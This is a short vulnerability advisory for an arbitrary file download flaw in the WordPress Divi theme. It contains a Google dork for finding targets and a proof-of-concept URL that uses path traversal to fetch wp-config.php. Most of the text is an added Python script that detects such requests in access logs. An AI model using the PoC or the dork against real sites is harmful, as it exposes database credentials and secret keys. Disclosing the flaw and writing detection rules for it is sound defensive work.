WordPress Theme Divi Arbitrary File Download Vulnerability

2015-02-09 17:05:03

# Exploit Title: WordPress Theme Divi Arbitrary File Download Vulnerability
# Date: 08/02/2015
# Exploit Author: pool and Fran_73
# Vendor Homepage: http://www.elegantthemes.com/gallery/divi/
# Contact : [email protected] ( YM )
# Tested on: Linux / Windows
# Google Dork: inurl:wp-content/themes/Divi/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
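
A detection sketch for the request shape in the PoC, added here as an example and not part of the original advisory: it scans web access logs for admin-ajax.php calls with action=revslider_show_image whose img value traverses directories or does not name an image. The combined log format, the image-extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client IP, request target and status from a combined-format access log line (assumed format)
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp")  # assumed allow-list

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e), bounded to a few rounds."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_img(img):
    """True when img contains a '..' path segment or does not end in an image extension."""
    img = fully_unquote(img).replace("\\", "/").lower()
    return ".." in img.split("/") or not img.endswith(IMAGE_EXT)

def scan(lines):
    """Return (client_ip, status, decoded_img) for each request matching the PoC shape."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(url.query)
        if "revslider_show_image" not in qs.get("action", []):
            continue
        for img in qs.get("img", []):
            if suspicious_img(img):
                hits.append((ip, int(status), fully_unquote(img)))
    return hits

# Constructed sample log lines (documentation IP ranges), not taken from a real server
SAMPLE = [
    '203.0.113.7 - - [09/Feb/2015:17:05:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '198.51.100.4 - - [09/Feb/2015:17:06:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/slide1.jpg HTTP/1.1" 200 48211',
    '203.0.113.9 - - [09/Feb/2015:17:07:44 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%2fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.8 - - [09/Feb/2015:17:08:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for ip, status, img in scan(SAMPLE):
        print(f"{ip} status={status} img={img}")
```

Hits with status 200 are the ones to triage first, since wp-config.php holds the site's database credentials and secret keys.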


Fixes

No fixes
